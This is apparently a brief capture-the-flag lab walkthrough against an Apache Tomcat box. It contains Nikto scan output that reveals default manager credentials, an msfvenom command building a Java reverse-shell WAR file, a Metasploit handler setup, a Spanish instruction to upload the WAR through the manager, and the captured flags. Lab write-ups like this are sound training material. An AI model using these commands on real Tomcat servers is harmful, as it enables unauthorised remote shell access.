10.10.10.95

+ Server: Apache-Coyote/1.1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /favicon.ico, fields: 0xW/21630 0x1525691762000
+ OSVDB-39272: favicon.ico file identifies this server as: Apache Tomcat
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ Default account found for 'Tomcat Manager Application' at /manager/html (ID 'tomcat', PW 's3cret'). Apache Tomcat.
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/html: Tomcat Manager / Host Manager interface found (pass protected)
+ /manager/status: Tomcat Server Status interface found (pass protected)
+ 7604 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2018-07-04 16:01:37 (GMT1) (310 seconds)

+ Default tomcaaccount found for ‘Tomcat Manager Application’ at /manager/html (ID ‘tomcat’, PW ‘s3cret’). Apache Tomcat.

http://10.10.10.95:8080/manager/html

root@kali:~# msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f war > algo.war


msf > use exploit/multi/handler 
msf exploit(multi/handler) > set payload java/shell_reverse_tcp 
payload => java/shell_reverse_tcp
msf exploit(multi/handler) > set LHOST 10.10.14.7
LHOST => 10.10.14.7
msf exploit(multi/handler) > run

Subes el archivo al manager y lo abres y eso es todo 

C:\Users\Administrator\Desktop\flags>more "2 for the price of 1.txt"
more "2 for the price of 1.txt"
user.txt
7004dbcef0f854e0...

root.txt
04a8b36e1545a455...